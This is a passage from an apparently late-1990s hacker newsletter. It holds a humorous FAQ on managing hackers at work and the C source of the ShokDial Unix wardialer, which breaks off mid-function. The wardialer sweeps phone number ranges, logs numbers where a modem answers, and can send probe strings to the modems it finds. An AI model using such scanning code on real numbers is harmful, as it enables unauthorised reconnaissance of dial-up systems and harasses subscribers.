LywsPrvwvAyZadJYhp7KEgJwmGZVZ9/8fHJhWYgTLNJBj75o1LP9Cbb2e8b8ZRoM 70nETXVyuX9vz0gQVctS1RhPkqF7w/uJ72Q/1kFVr9jMzAVbYoYA9l1vaFdIjDhi CYokjKs2vfKeCNSD3xciVi+FSOUBVh8MRPRgoXnCrdm2UeRpeZoUKVhfzGPdXD0I VVIKzgEN83r/6CM9ZZskZMCdOKSN1HQPtcm3jfp/fOBQhZnYZQ9Muw== =cskZ -----END PGP SIGNATURE----- @HWA 18.0 The proper care and feeding of your new hacker will ensure months of enjoyable employment on end. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following is from: http://www.plethora.net/~seebs/faqs/hacker.html The following list is an attempt to cover some of the issues that will invariably come up when people without previous experience of the hacker community try to hire a hacker. This FAQ is intended for free distribution, and may be copied as desired. It is in an early revision. If you wish to modify the FAQ, or distribute it for publication, please contact the author. The author is seebs@plethora.net. The official distribution site (as of revision 0.04) is "http://www.plethora.net/~seebs/faqs/hacker.html". If you find this information useful, please consider sending a token donation to the author; email for details. DISCLAIMER: The author is a hacker. Bias is inevitable. This document is copyright 1995, 1996, 1998 Peter Seebach. Unaltered distribution is permitted. Revision 0.04 - Last modified September 7, 1998 Questions and Answers: Section 0: Basic understanding. 0.0: Won't my hacker break into my computer and steal my trade secrets? No. Hackers aren't, contrary to media reporting, the people who break into computers. Those are crackers. Hackers are people who enjoy playing with computers. Your hacker may occasionally circumvent security measures, but this is not malicious; she just does it when the security is in her way, or because she's curious. 0.1: Was it a good idea to hire a hacker? It depends on the job. A hacker can be dramatically more effective than a non-hacker at a job, or dramatically less effective. Jobs where hackers are particularly good are: Systems administration Programming Design Jobs where hackers are particularly bad are Data entry More generally, a job that requires fast and unexpected changes, significant skill, and is not very repetitive will be one a hacker will excel at. Repetitive, simple jobs are a waste of a good hacker, and will make your hacker bored and frustrated. No one works well bored and frustrated. The good news is, if you get a hacker on something he particularly likes, you will frequently see performance on the order of five to ten times what a "normal" worker would produce. This is not consistent, and you shouldn't expect to see it all the time, but it will happen. This is most visible on particularly difficult tasks. 0.2: How should I manage my hacker? The same way you herd cats. It can be a bit confusing; they're not like most other workers. Don't worry! Your hacker is likely to be willing to suggest answers to problems, if asked. Most hackers are nearly self-managing. 0.3: Wait, you just said "10 times", didn't you? You're not serious, right? Actually, I said "ten times". And yes, I am serious; a hacker on a roll may be able to produce, in a period of a few months, something that a small development group (say, 7-8 people) would have a hard time getting together over a year. They also may not. Your mileage will vary. IBM used to report that certain programmers might be as much as 100 times as productive as other workers, or more. This kind of thing happens. 0.4: I don't understand this at all. This is confusing. Is there a book on this? Not yet. In the meantime, check out The New Hacker's Dictionary (references below; also known as "the jargon file"), in particular some of the appendices. The entire work is full of clarifications and details of how hackers think. Section 1: Social issues 1.0: My hacker doesn't fit in well with our corporate society. She seems to do her work well, but she's not really making many friends. This is common. Your hacker may not have found any people around who get along with hackers. You may wish to consider offering her a position tele-commuting, or flexible hours (read: night shift), which may actually improve her productivity. Or hire another one. 1.1: My hacker seems to dress funny. Is there any way to impress upon him the importance of corporate appearance? Your hacker has a very good understanding of the importance of corporate appearance. It doesn't help you get your job done. IBM, Ford, and Microsoft have all realized that people work better when they can dress however they want. Your hacker is dressed comfortably. A polite request to dress up some for special occasions may well be honored, and most hackers will cheerfully wear clothes without holes in them if specifically asked. 1.2: My hacker won't call me by my title, and doesn't seem to respect me at all. Your hacker doesn't respect your title. Hackers don't believe that management is "above" engineering; they believe that management is doing one job, and engineering is doing another. They may well frequently talk as if management is beneath them, but this is really quite fair; your question implies that you talk as if engineering is beneath you. Treat your hacker as an equal, and she will probably treat you as an equal -- quite a compliment! 1.3: My hacker constantly insults the work of my other workers. Take your hacker aside, and ask for details of what's wrong with the existing work. It may be that there's something wrong with it. Don't let the fact that it runs most of the time fool you; your hacker is probably bothered by the fact that it crashes at all. He may be able to suggest improvements which could dramatically improve performance, reliability, or other features. It's worth looking into. You may be able to convince your hacker to be more polite, but if there appear to be major differences, it's quite possible that one or more of your existing staff are incompetent. Note that hackers, of course, have different standards of competence than many other people. (Read "different" as "much higher".) Section 2: Productivity. 2.0: My hacker plays video games on company time. Hackers, writers, and painters all need some amount of time to spend "percolating" -- doing something else to let their subconscious work on a problem. Your hacker is probably stuck on something difficult. Don't worry about it. 2.1: But it's been two weeks since I saw anything! Your hacker is working, alone probably, on a big project, and just started, right? She's probably trying to figure it all out in advance. Ask her how it's going; if she starts a lot of sentences, but interrupts them all with "no, wait..." or "drat, that won't work", it's going well. 2.2: Isn't this damaging to productivity? No. Your hacker needs to recreate and think about things in many ways. He will be more productive with this recreation than without it. Your hacker enjoys working; don't worry about things getting done reasonably well and quickly. 2.3: My hacker is constantly doing things unrelated to her job responsibilities. Do they need to be done? Very few hackers can resist solving a problem when they can solve it, and no one else is solving it. For that matter, is your hacker getting her job done? If so, consider these other things a freebie or perk (for you). Although it may not be conventional, it's probably helping out quite a bit. 2.4: My hacker is writing a book, reading USENET news, playing video games, talking with friends on the phone, and building sculptures out of paper clips. On company time! He sounds happy. The chances are he's in one of three states: 1.Basic job responsibilities are periodic (phone support, documentation, et al.) and there's a lull in incoming work. Don't worry about it! 2.Your hacker is stuck on a difficult problem. 3.Your hacker is bored silly and is trying to find amusement. Perhaps you should find him more challenging work? Any of these factors may be involved. All of them may be involved. In general, if the work is challenging, and is getting done, don't worry too much about the process. You might ask for your corporation to be given credit in the book. 2.5: But my other workers are offended by my hacker's success, and it hurts their productivity. Do you really need to have workers around who would rather be the person getting something done, than have it done already? Ego has very little place in the workplace. If they can't do it well, assign them to something they can do. Section 3: Stimulus and response 3.0: My hacker did something good, and I want to reward him. Good! Here are some of the things most hackers would like to receive in exchange for their work: 1.Respect. 2.Admiration. 3.Compliments. 4.Understanding. 5.Discounts on expensive toys. 6.Money. These are not necessarily in order. The 4th item (understanding) is the most difficult. Try to remember this good thing your hacker just did the next time you discover he just spent a day playing x-trek. Rather than complaining about getting work done, write it off as "a perk" that was granted (informally) as a bonus for a job well done. Don't worry; hackers get bored quickly when they aren't doing their work. 3.1: My hacker did something bad, and I want to punish him. Don't. 30 years of psychological research has shown that punishment has no desirable long-term effects. Your hacker is not a lab rat. (Even if he *were* a lab rat, punishment wouldn't work; at least, not if he were one of the sorts of lab rats the psych research was done on.) If you don't like something your hacker is doing, express your concerns. Explain what it is that bothers you about the behavior. Be prepared for an argument; your hacker is a rational entity, and presumably had reasons. Don't jump on him too quickly; they may turn out to be good reasons. Don't be afraid to apologize if you're wrong. If your hacker admits to having been wrong, don't demand an apology; so far as the hacker is concerned, admitting to being wrong is an apology, most likely. 3.2: I don't get it. I offered my hacker a significant promotion, and she turned it down and acted offended. A promotion frequently involves spending more time listening to people describing what they're doing, and less time playing with computers. Your hacker is enjoying her work; if you want to offer a reward, consider an improvement in title, a possible raise, and some compliments. Make sure your hacker knows you are pleased with her accomplishments -- that's what she's there for. 3.3: My company policy won't let me give my hacker any more raises until he's in management. Your company policy is broken. A hacker can earn as much as $150 an hour (sometimes more) doing free-lance consulting. You may wish to offer your hacker a contracted permanent consulting position with benefits, or otherwise find loopholes. Or, find perks to offer - many hackers will cheerfully accept a discount on hardware from their favorite manufacturer as an effective raise. 3.4: I can't believe the hacker on my staff is worth as much as we're paying. Ask the other staff in the department what the hacker does, and what they think of it. The chances are that your hacker is spending a few hours a week answering arcane questions that would otherwise require an expensive external consultant. Your hacker may be fulfilling another job's worth of responsibilities in his spare time around the office. Very few hackers aren't worth what they're getting paid; they enjoy accomplishing difficult tasks, and improving worker efficiency. Section 4: What does that mean? 4.0: My hacker doesn't speak English. At least, I don't think so. Your hacker is a techie. Your best bet is to pick up a copy of TNHD (The New Hacker's Dictionary). It can be found as http://www.ccil.org/jargon (last I checked) or from a good bookstore. If you have trouble understanding that reference, ask your hacker if she has a copy, or would be willing to explain her terms. Most hackers are willing to explain terms. Be ready for condescension; it's not intended as an insult, but if you don't know the words, she probably has to talk down to you at first to explain them. It's a reasonably difficult set of words; there are a lot of them, and their usage is much more precise than it sounds. Hackers love word games. [It is also possible that English is not your hacker's native language, and that it's not yours either. Feel free to substitute a more appropriate language.] 4.1: I can't get an estimate out of my hacker. Your hacker hasn't figured out how hard the problem is yet. Unlike most workers, hackers will try very hard to refuse to give an estimate until they know for sure that they understand the problem. This may include solving it. No good engineer goes beyond 95% certainty. Most hackers are good engineers. If you say you will not try to hold him to the estimate (and mean it!) you are much more likely to get an approximate estimate. The estimate may sound very high or very low; it may be very high or very low. Still, it's an estimate, and you get what you ask for. 4.2: My hacker makes obscure, meaningless jokes. If you feel brave, ask for an explanation. Most of them can be explained. It may take a while, but it may prove interesting. 4.3: My hacker counts from zero. So does the computer. You can hide it, but computers count from zero. Most hackers do by habit, also. Comments about this article can be sent to seebs@plethora.net 19.0 Unix wardialer from w00w00 security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This is included here for example purposes, the full source is available at http://www.w00w00.org/w00w00/ShokDial/ ShokDial Unix Wardialer source /* ShokDial */ /* w00w00! */ /* This is (I have never seen one anyway, I apologize if I'm wrong) */ /* the first war dialer that I've ever seen for unix. This will */ /* compile on most/all unix operating systems. */ /* */ /* Shok (Matt Conover) */ /* shok@sekurity.org, shok@w00w00.org */ #include #include #include #include #include #include #include #include #include #include "colors.h" #define ERROR -1 #define LOGFILE "wardial.log" /* * Used as the default logfile, * unless you change this define * or specify it as an option. * Type: shokdial -h for help. */ #define VERSION "v4.1" #define TIMEOUT 25 /* * YOU WANT TO CONFIGURE THIS!!! * This is how long it will wait until it * gives up (or connects, whichever comes first */ /* You can do: * ln -s /dev/cua1 /dev/modem * or change this to /dev/cua1 (or whatever your COM is) * cua0 = COM1 cua1 = COM2 * (in linux)...in IRIX this would be /dev/ttymX I believe */ #define MODEMPORT "/dev/modem" /* Global variables */ /* ---------------- */ int fd; /* fd for modem */ int rand; /* Use random scanning if this is set */ int send; /* Do we send a string to the carrier? */ int daemon; /* Do we fork into the background? */ int listen; /* Do we check a response from the carrier? */ int useStdin; /* Do we read numbers from stdin? */ int numbytes; /* To verify that all the bytes were written */ int First3Digits; /* Such as "555" of 555-XXXX */ /* However, this also serves as the area code */ /* for a long distance number */ int First3Digits1; /* This allows multiple ranges such as */ /* 555-XXXX through 556-XXXX */ int Last3Digits; /* Used as XXX-555-XXXX */ int Last3Digits1; /* Same purpose as First3Digits1 */ int ScanMin; /* Number to scan from....like 0000 and up */ int ScanMin1; /* Where to hold ScanMin the whole time */ int ScanMax; /* Stop scanning when this number is reached */ int response; /* Used to test if response timed out */ char *LogFile; /* Where to log connections */ char buf[2048]; /* Buffer for strings returned by modem */ char pnum[512]; /* This is the phone number from config file */ char LocalOrLong; /* Dialing long distance of local */ char sendstring[512]; /* Send to string to carrier (if send is set) */ char *ProgName; int noshow; /* Don't display opening port when reopening */ int conf; /* Dial using config file */ int noOK; /* Used with hanging up and checking "OK" */ volatile int sig; /* Set after signal received and finished */ volatile int connected = 0; /* Set to 1 when connected. */ /* Some statistics. */ int busy = 0; int connect = 0; int noresponse = 0; /* Function prototypes */ /* ------------------- */ void usage(); /* Help/usage */ void version(); /* Display version */ void intro(); /* An introduction */ void daemonize_me(); /* Fork into the background */ void get_scanrange(); /* Get the scanning range */ void open_port(); /* Open modem port for dialing */ void init_modem(); /* Initialize the modem */ void dial_number(); /* Dial the number */ void inputdial(); /* Read numbers from stdin */ void confdial(char *confile); /* For reading/dialing from conf file */ void hangup(); /* Hang up modem. */ void menu(int signum); /* Called when an abort is received. */ void sighandler(int signum); /* Used when signals are received */ void sighandler1(int signum); /* Ditto */ void stopnow(int signum); /* Called from sig handler for an un- */ /* conditional exit. */ /* Function prototypes in other source files: */ /* ------------------------------------------ */ /* Check read/write/opens for errors */ void check_for_error(char *LogFile, int fd, int num, char *s); /* Check for "OK" from modem in reads. */ int checkok(char *LogFile, int fd, char *buf, char *s); /* Check if the phone num was valid. */ void local_validnum(int digits); void long_validnum(int firstdigits, int lastdigits); /* Check to make sure they didn't pass conflicting options. */ void checkoptions(); /* Other miscellaneous prototypes included to avoid. */ int clr(); void strip(); int main(int argc, char **argv) { int opt; char *confile; clr(); /* Clear the screen. */ /* Do some stuff with the arguments */ /* ----------------------------------------------------- */ ProgName = argv[0]; if (argc > 1) { while ((opt = getopt (argc, argv, "SsrdvhL:lc:")) != ERROR) switch(opt) { case 'S': useStdin = 1; break; case 's': send = 1; break; case 'r': rand = 1; break; case 'd': daemon = 1; break; case 'v': version(); case 'h': usage(); case 'L': LogFile = optarg; break; case 'l': listen = 1; break; case 'c': conf = 1; confile = optarg; break; case '?': putchar('\n'); usage(); default: usage(); } } /* Check to make sure they didn't pass conflicting options. */ checkoptions(); /* exit()'s if there is an error */ if (conf != 1 && useStdin != 1) printf("\"%s-r%s\" (%srandom scanning%s) option not given, using %ssequential scanning%s instead.\n", PINK, NORMAL, BOLDWHITE, NORMAL, BOLDRED, NORMAL); if (LogFile == NULL) { LogFile = LOGFILE; printf("Using \"%s%s%s\" as log file.\n", BOLDGREEN, LogFile, NORMAL); } printf("\nHit any key to continue..."); getchar(); /* ----------------------------------------------------- */ clr(); /* Clear the screen. */ intro(); clr(); /* Clear the screen. */ if (conf != 1 && useStdin != 1) get_scanrange(); /* We don't want to handle any signals until here */ signal(SIGINT, menu); signal(SIGTERM, menu); signal(SIGHUP, SIG_IGN); signal(SIGALRM, sighandler1); if (daemon == 1) daemonize_me(); /* Run the program in the background */ open_port(); /* Open MODEMPORT (by default /dev/cua1) */ init_modem(); /* Initialize modem (such as sending ATZ) */ if (send == 1) { printf("Enter string to send to carrier (when connected): "); scanf("%512s", sendstring); } /* What type of dialing are we using? */ if (conf == 1) confdial(confile); /* Read numbers to dial from a config file */ else if (useStdin == 1) inputdial(); /* Read numbers from stdin */ else dial_number(); /* Do the scanning (used by default, instead */ /* of confdial(), inputdial(), etc.) */ /* ---------------------------------- */ hangup(); /* Hang up the modem */ close(fd); /* Close the open file descriptor of the modem */ return 0; } /* -------------------------------------------------- */ void version() { printf("This is %sS%sh%so%sk%sD%si%sa%sl %s%s%s...please keep notice of this.\n", BOLDCYAN, BOLDGREEN, BOLDBLUE, BOLDPINK, YELLOW, BOLDWHITE, BOLDRED, PINK, BOLDBLUE, VERSION, NORMAL); printf("in case this program under goes some new features, fixes, etc.\n\n"); printf("\t\t\t%s Shok %s\n\t\t (%sMatt Conover%s)\n\n", BOLDBLUE, NORMAL, BOLDWHITE, NORMAL); printf("%sEmail%s: %sshok@w00w00.org%s, %sshok@sekurity.org%s\n", BOLDWHITE, NORMAL, PINK, NORMAL, PINK, NORMAL); printf("%sWWW%s: %shttp://www.w00w00.org/%s\n", BOLDWHITE, NORMAL, PINK, NORMAL); printf("%sFTP%s: %sftp://ftp.w00w00.org/pub%s\n\n", BOLDWHITE, NORMAL, PINK, NORMAL); exit(0); } /* -------------------------------------------------- */ void usage() { printf("Usage: %s%s %s[-rhvdSsl]%s -c [config file]%s -L [logfile]%s\n\n", PINK, ProgName, BOLDWHITE, BOLDCYAN, BOLDGREEN, NORMAL); printf("Options:\n"); printf("%s-r%s for %srandom%s (as opposed to %ssequential%s) scanning\n", BOLDCYAN, NORMAL, PINK, NORMAL, YELLOW, NORMAL); printf("%s-h%s for %shelp%s....what you're seeing now\n", PINK, NORMAL, BOLDRED, NORMAL); printf("%s-v%s for the %sversion%s...because this will probably undergo changes\n", BOLDGREEN, NORMAL, BOLDCYAN, NORMAL); printf("%s-d%s to run in the %sbackground%s.\n", BLUE, NORMAL, BOLDGREEN, NORMAL); printf("%s-S%s to read numbers from %sstdin%s\n", PINK, NORMAL, BOLDRED, NORMAL); printf("%s-l%s to listen for a %sresponse%s from the carrier\n", BOLDCYAN, NORMAL, PINK, NORMAL); printf("%s-s%s to send a %sstring%s to the carrier\n", BOLDGREEN, NORMAL, BOLDCYAN, NORMAL); printf("%s-c%s to read phone numbers from a %sconfig file%s.\n", YELLOW, NORMAL, BOLDCYAN, NORMAL); printf("%s-L%s to specify the %slogfile%s.\n", BOLDRED, NORMAL, PINK, NORMAL); putchar('\n'); printf("The %slogfile%s is by default %s%s%s if not specified.\n", BOLDCYAN, NORMAL, BOLDGREEN, LOGFILE, NORMAL); printf("The %sconfig file%s is only specified if %s-c%s option is used.\n", PINK, NORMAL, BOLDCYAN, NORMAL); putchar('\n'); exit(1); } /* -------------------------------------------------- */ void intro() { printf("\t\t%sS%sh%so%sk%sd%si%sa%sl%s %s%s %sf%so%sr %sU%sN%si%sX%s\n", BLINKCYAN, BOLDGREEN, BOLDBLUE, BOLDPINK, YELLOW, BOLDWHITE, BOLDRED, PINK, BOLDBLUE, VERSION, NORMAL, PINK, BOLDCYAN, BOLDGREEN, BOLDPINK, BOLDGREEN, BOLDWHITE, BOLDBLUE, NORMAL); printf("\t\t----------------------\n"); printf("\nWell what you do here, is enter 0000 for the range to begin\n"); printf("scanning and 9999 to end scanning if you want to scan all the\n"); printf("possible ranges, but you can put 4444 for the nmber to start\n"); printf("and 5555 for the number to begin to scan XXX-[4444-5555] for\n"); printf("local numbers and it would be 1-XXX-XXX-[4444-5555] for long\n"); printf("distance.\n"); printf("\nAlso, you can use random scanning (as opposed to sequential\n"); printf("scanning) by specifying the \"%s-r%s\" option...type:\n", PINK, NORMAL); printf("%s%s%s -h %sfor %shelp%s.\n\n", BOLDRED, ProgName, BOLDRED, NORMAL, BOLDCYAN, NORMAL); printf("Anyway, enjoy!\n\n"); printf("\t\t\t%s Shok %s\n\t\t (%sMatt Conover%s)\n\n", BOLDBLUE, NORMAL, BOLDWHITE, NORMAL); printf("%sEmail%s: %sshok@w00w00.org%s, %sshok@sekurity.org%s\n", BOLDWHITE, NORMAL, PINK, NORMAL, PINK, NORMAL); printf("%sWWW%s: %shttp://www.w00w00.org/%s\n", BOLDWHITE, NORMAL, PINK, NORMAL); printf("%sFTP%s: %sftp://ftp.w00w00.org/pub%s\n\n", BOLDWHITE, NORMAL, PINK, NORMAL); printf("Hit enter to continue...\n"); getchar(); } /* -------------------------------------------------- */ void daemonize_me() { pid_t pid; if ((pid = fork()) == ERROR) { perror("fork"); exit(ERROR); } if (pid != 0) exit(0); } /* -------------------------------------------------- */ void get_scanrange() { /* Get location of numbers: local numbers or long distance numbers */ LorD: printf("Scanning..\n(%sL%s)ocal, Long (%sD%s)istance: ", PINK, NORMAL, PINK, NORMAL); while(1) { LocalOrLong = getchar(); if (!isprint(LocalOrLong)) continue; if ((toupper(LocalOrLong) != 'L') && (toupper(LocalOrLong) != 'D')) { printf("%sInvalid%s option '%s%c%s'. Enter '%sL%s' or '%sD%s'.\n\n", BOLDRED, NORMAL, BOLDCYAN, LocalOrLong, NORMAL, YELLOW, NORMAL, YELLOW, NORMAL); goto LorD; /* Reprint message. */ } else break; } if (toupper(LocalOrLong) == 'L') { /* Use local phone numbers */ if (rand != 1) { /* Using sequential scanning */ printf("Enter number to begin scan on (555-1111): "); scanf("%3d%*c%4d", &First3Digits, &ScanMin); local_validnum(First3Digits); /* Make sure the first 3 digits */ /* were a valid number. */ ScanMin1 = ScanMin; /* ScanMin changes, so we need a second */ /* variable to store the original number. */ } else { /* Using random scanning */ printf("Enter the first 3 digits (555 for random scanning of 555-XXXX): "); scanf("%3d", &First3Digits); local_validnum(First3Digits); /* Make sure the first 3 digits */ /* were a valid number. */ ScanMin1 = ScanMin; /* ScanMin changes, so we need a second */ /* variable to store the original number. */ } /* Make sure the last 4 digits were valid */ if ((ScanMin < 0) || (ScanMin > 9999)) { printf("\"%s%d%s\" is invalid.\nScanning range must be %s0000-9999%s\n", BOLDCYAN, ScanMin, NORMAL, PINK, NORMAL); exit(ERROR); } if (rand != 1) { /* Using sequential scanning */ printf("Enter number to end scanning on (555-9999): "); scanf("%3d%*c%4d", &First3Digits1, &ScanMax); local_validnum(First3Digits1); /* Make sure the first 3 digits */ /* were a valid number. */ putchar('\n'); if ((ScanMax < ScanMin) || (ScanMax < 0) || (ScanMax > 9999)) { printf("\"%s%d%s\" is invalid.\n Scanning range must be %s0000-9999%s, and the %smaximum%s range must be %sgreater%s\nthan or equal to the %sminimum%s number.\n", BOLDCYAN, ScanMax, NORMAL, BOLDWHITE, NORMAL, PINK, NORMAL, BOLDWHITE, NORMAL, PINK, NORMAL); exit(ERROR); } } else putchar('\n'); /* -------------------- */ } else if (toupper(LocalOrLong) == 'D') { /* Use long distance numbers */ if (rand != 1) { /* Use sequential scanning */ printf("Enter number to start scanning (555-555-1111): "); scanf("%3d%*c%3d%*c%4d", &First3Digits, &Last3Digits, &ScanMin); /* Check if area code and first 3 digits of the phone num are */ /* valid. */ long_validnum(First3Digits, Last3Digits); ScanMin1 = ScanMin; /* ScanMin changes, so we need a second */ /* variable to store the original number. */ /* ... */ } else { /* Using random scanning */ printf("Enter the area code and prefix digits\n(555-555 for random scanning of 555-555-XXXX): "); scanf("%3d%*c%3d", &First3Digits, &Last3Digits); /* Check if area code and first 3 digits of the phone num are */ /* valid. */ long_validnum(First3Digits, Last3Digits); ScanMin1 = ScanMin; /* ScanMin changes, so we need a second */ /* variable to store the original number. */ } /* Make sure the last 4 digits were valid */ if ((ScanMin < 0) || (ScanMin > 9999)) { printf("\"%s%d%s\" is invalid.\nScanning range must be %s0000-9999%s\n", BOLDCYAN, ScanMin, NORMAL, PINK, NORMAL); exit(ERROR); } if (rand != 1) { /* Using sequential scanning */ printf("Enter number to end scanning (555-555-9999): "); scanf("%3d%*c%3d%*c%4d", &First3Digits1, &Last3Digits1, &ScanMax); putchar('\n'); /* Check if area code and first 3 digits of the phone num are */ /* valid. */ long_validnum(First3Digits1, Last3Digits1); if ((ScanMax < ScanMin) || (ScanMax < 0) || (ScanMax > 9999)) { printf("\"%s%d%s\" is invalid.\n Scanning range must be %s0000-9999%s, and the %smaximum%s range must be %sgreater%s\nthan or equal to the %sminimum%s number.\n", BOLDCYAN, ScanMax, NORMAL, BOLDWHITE, NORMAL, PINK, NORMAL, BOLDWHITE, NORMAL, PINK, NORMAL); exit(ERROR); } } else putchar('\n'); } else { printf("You must specify \"%sL%s\" for %slocal%s or \"%sD%s\" for %slong distance%s\n", PINK, NORMAL, BOLDCYAN, NORMAL, PINK, NORMAL, BOLDCYAN, NORMAL); exit(ERROR); } } /* -------------------------------------------------- */ void open_port() { if (noshow != 1) printf("Opening modem for dialing...\n"); fd = open(MODEMPORT, O_RDWR | O_NOCTTY); if (fd == ERROR) { perror("open"); exit(ERROR); } noshow = 1; /* We use this function for reopening as well */ } /* -------------------------------------------------- */ void init_modem() { FILE *logfile; if ((logfile = fopen(LogFile, "a")) == NULL) { perror("fopen"); close(fd); exit(ERROR); } printf("Initializing modem (port %s%s%s)....\n", PINK, MODEMPORT, NORMAL); /* Hang up modem if it's already on */ hangup(); numbytes = write(fd, "+++\r", 4); check_for_error(LogFile, fd, numbytes, "write"); usleep(1000000); numbytes = write(fd, "ATZ\r", 4); check_for_error(LogFile, fd, numbytes, "write"); usleep(2000000); /* Use this because we're using SIGALRM which */ /* is what sleep() uses. */ memset(buf, 0, sizeof(buf)); numbytes = read(fd, buf, sizeof(buf)); check_for_error(LogFile, fd, numbytes, "read"); noOK = checkok(LogFile, fd, buf, "initializing modem"); if (noOK == 1) { fclose(logfile); close(fd); exit(ERROR); } memset(buf, 0, sizeof(buf)); fclose(logfile); } /* -------------------------------------------------- */ void dial_number() { time_t tm; /* Where we our calendar time is stored */ FILE *logfile; /* for the log file */ char date[32]; /* Contain time scanning started/stopped */ char phonenum[20]; /* If local: phonenum = First3Digits + ScanMin */ /* If long distance: phonenum = */ /* First3Digits + Last3Digits + ScanMin */ if ((logfile = fopen(LogFile, "a")) == NULL) { perror("fopen"); exit(ERROR); } fprintf(logfile, "\n----------------------\n\n"); fflush(logfile); memset(buf, 0, sizeof(date)); memset(buf, 0, sizeof(buf)); tm = time(NULL); sprintf(date, "%s", ctime(&tm)); fprintf(logfile, "Started scanning at/on: %s", date); fflush(logfile); memset(date, 0, sizeof(date)); if (daemon == 1) putchar('\n'); /* Just to make it look nicer */ printf("Using a %s%d%s second connection %stimeout%s.\n", BOLDCYAN, TIMEOUT, NORMAL, BOLDWHITE, NORMAL); if (toupper(LocalOrLong) == 'L') { /* Local call */ fprintf(logfile, "Scanning local numbers...\n"); fprintf(logfile, "Using a %d second connection timeout.\n", TIMEOUT); fprintf(logfile, "Starting scanning with %d-%.4d\n\n", First3Digits, ScanMin); fflush(logfile); while (1) { if (rand == 1) ScanMin = (random() % 8889) + 11; printf("Dialing %s%d-%.4d%s...\n", PINK, First3Digits, ScanMin, NORMAL); memset(phonenum, 0, sizeof(phonenum)); sprintf(phonenum, "ATDT%d%.4d\r", First3Digits, ScanMin); numbytes = write(fd, phonenum, strlen(phonenum)); check_for_error(LogFile, fd, numbytes, "write"); memset(buf, 0, sizeof(buf)); alarm(TIMEOUT); /* How long to wait for timeout */ sig = 0; connected = 1; /* * Easier to set it to 1 and then set it * to 0 if it's not than vice versa. */ do { numbytes = read(fd, buf, 511); if (sig == 1) break; } while ((strstr(buf, "CONNECT")) == NULL); alarm(0); /* Turn alarm off if we haven't already. */ if (connected == 0) noresponse++; else if ((strstr(buf, "BUSY")) != NULL) busy++; /* Compare the string with "CONNECT" */ if (connected == 1) { /* Sighandler sets this to 0 when */ /* it's called...meaning time out. */ #ifdef BEEP putchar('\a'); #endif connect++; fprintf(logfile, "*** CONNECT *** to %d-%.4d\n", First3Digits, ScanMin); printf("%s*** %sCONNECT %s%s*** %s to %s%d-%.4d%s\n", BOLDWHITE, BOLDCYAN, NORMAL, BOLDWHITE, NORMAL, PINK, First3Digits, ScanMin, NORMAL); /* Send a string to the carrier and check for response */ if (send && listen) { /* send poke string and listen for reply */ if (write(fd, sendstring, sizeof(sendstring)) == ERROR) { perror("write"); close(fd); fclose(logfile); exit(ERROR); } response = 1; /* Sighandler will set this to 0 when it */ /* times out */ printf("response from carrier (after sending string): "); fprintf(logfile, "response from carrier (after sending string): "); fflush(stdout), fflush(logfile); if (read(fd, buf, sizeof(buf)) == ERROR) { perror("read"); printf("continuing anyway...\n"); } if (response == 1) { printf("%s\n", buf); fprintf(logfile, "%s\n", buf); } else { printf("timed out while waiting for response\n"); fprintf(logfile, "timed out while waiting for response\n"); } } else { /* listen = 1, send = 0 */ response = 1; /* The sighandler will set this to 0 if it */ /* times out */ printf("response from carrier: "); fprintf(logfile, "response from carrier: "); if (read(fd, buf, sizeof(buf)) == ERROR) { perror("read"); printf("continuing anyway...\n"); } if (response == 1) { printf("%s\n", buf); fprintf(logfile, "%s\n", buf); } else { printf("timed out while waiting for response\n"); fprintf(logfile, "timed out while waiting for response\n"); } } } memset(buf, 0, sizeof(buf)); hangup(); if (rand != 1) { /* Increase ScanMin so it scans for the next number */ ScanMin++; if (ScanMin > ScanMax) { /* If they are different...then they are scanning */ /* something like: 555-XXXX through 556-XXXX. */ /* So now we reset everything. */ /* * If you did: 755-XXXX through 757-XXXX, we need to * increase the 755 and repeat until they are the same. */ if (First3Digits != First3Digits1) { First3Digits++; ScanMin = ScanMin1; /* Restored ScanMin to its */ /* original value. */ continue; } memset(buf, 0, sizeof(buf)); #ifdef BEEP putchar('\a'); #endif fprintf(logfile, "\nFinished scanning %d-%.4d through %d-%d.\n", First3Digits, ScanMin1, First3Digits, ScanMax); memset(date, 0, sizeof(date)); tm = time(NULL); sprintf(date, "%s", ctime(&tm)); fprintf(logfile, "Finished at/on: %s", date); fflush(logfile); printf("Finished scanning %s%d-%.4d %sthrough %s%d-%.4d%s.\n", BOLDCYAN, First3Digits, ScanMin1, NORMAL, BOLDCYAN, First3Digits, ScanMax, NORMAL); /* Print statistics. */ printf("%sResults%s:\n", BOLDRED, NORMAL); printf("\t# of %ssuccessful connects%s: %s%d%s\n", BOLDCYAN, NORMAL, PINK, connect, NORMAL); printf("\t# of lines %sbusy%s: %s%d%s\n", YELLOW, NORMAL, PINK, busy, NORMAL); printf("\t# of %sno responses (timed out)%s: %s%d%s\n", BOLDGREEN, NORMAL, PINK, noresponse, NORMAL); printf("Thanks for using %sS%sh%so%sk%sD%si%sa%sl %s%s%s.\n", BLINKCYAN, BOLDGREEN, BOLDBLUE, BOLDPINK, YELLOW, BOLDWHITE, BOLDRED, PINK, BOLDBLUE, VERSION, NORMAL); return; } } memset(phonenum, 0, sizeof(phonenum)); } } else { /* (Long Distance call) */ memset(buf, 0, sizeof(buf)); fprintf(logfile, "Scanning long distance numbers...\n"); fprintf(logfile, "Using a %d second connection timeout.\n", TIMEOUT); fprintf(logfile, "Started scanning with 1-%.3d-%.3d-%.4d\n\n", First3Digits, Last3Digits, ScanMin); fflush(logfile); while(1) { if (rand == 1) ScanMin = (random() % 8889) + 1111; printf("Dialing %s1-%.3d-%.3d-%.4d%s...\n", PINK, First3Digits, Last3Digits, ScanMin, NORMAL); memset(phonenum, 0, sizeof(phonenum)); sprintf(phonenum, "ATDT1%.3d%.3d%.4d\r", First3Digits, Last3Digits, ScanMin); numbytes = write(fd, phonenum, strlen(phonenum)); check_for_error(LogFile, fd, numbytes, "write"); memset(buf, 0, sizeof(buf)); alarm(TIMEOUT); /* How long to wait for timeout. */ sig = 0; connected = 1; /* * Easier to say it's connected and then * set it to 0 if it's not than vice versa. */ do { numbytes = read(fd, buf, 511); if (sig == 1) break; } while ((strstr(buf, "CONNECT")) == NULL); alarm(0); if (connected == 0) noresponse++; else if ((strstr(buf, "BUSY")) != NULL) busy++; if (connected == 1) { /* The sighandler sets this to 0 when */ /* it gets called. */ #ifdef BEEP putchar('\a'); #endif 